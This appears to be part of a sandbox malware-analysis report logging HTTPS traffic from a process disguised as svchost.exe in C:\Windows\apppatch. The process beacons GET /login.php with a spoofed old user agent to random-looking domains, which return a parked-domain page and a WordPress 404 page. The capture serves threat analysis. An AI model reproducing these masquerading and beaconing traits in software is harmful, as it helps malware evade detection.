                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTQ1MGExMDItNDE3OC00MmYwLWFmYjYtMGNhNjQyODRiNmM1IiwicGFnZV90aW1lIjoxNzMxMzQ1OTY1LCJwYWdlX3VybCI6I


                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.84971875.2.71.1994431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                          Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:06 GMT
                                                                                                                                                                                                          Etag: "8c9v1ec68j19wv"
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Server: awselb/2.0
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          X-Powered-By: Next.js
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                          Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                          Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                          Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                          Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                          Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                          Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                          Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                          Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                          2024-11-11 17:24:06 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                          Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.849720188.114.96.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC953INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:07 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYkiumj9Wri0p%2FHZplvKPW1E887pxGPL%2Fve25cBv%2FCZX7RKytpcypjUou6i7KWdhFM7ABooZ6gocQb6IHrRz1FT%2BKaVNw0I%2BpNhXlEJvy4rUJrUU%2Fvb6ZOADciN9Kw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff959587e431b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1913&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1472292&cwnd=251&unsent_bytes=0&cid=a5f7d7368a388f6b&ts=740&x=0"
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC416INData Raw: 37 63 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7ca4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC1369INData Raw: 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20
                                                                                                                                                                                                          Data Ascii: </style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC1369INData Raw: 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e
                                                                                                                                                                                                          Data Ascii: nction c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.can
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC1369INData Raw: 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f
                                                                                                                                                                                                          Data Ascii: ined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSO
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69
                                                                                                                                                                                                          Data Ascii: ).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minifi
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC1369INData Raw: 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f
                                                                                                                                                                                                          Data Ascii: site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;fo
                                                                                                                                                                                                          2024-11-11 17:24:07 UTC1369INData Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d
                                                                                                                                                                                                          Data Ascii: ]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-
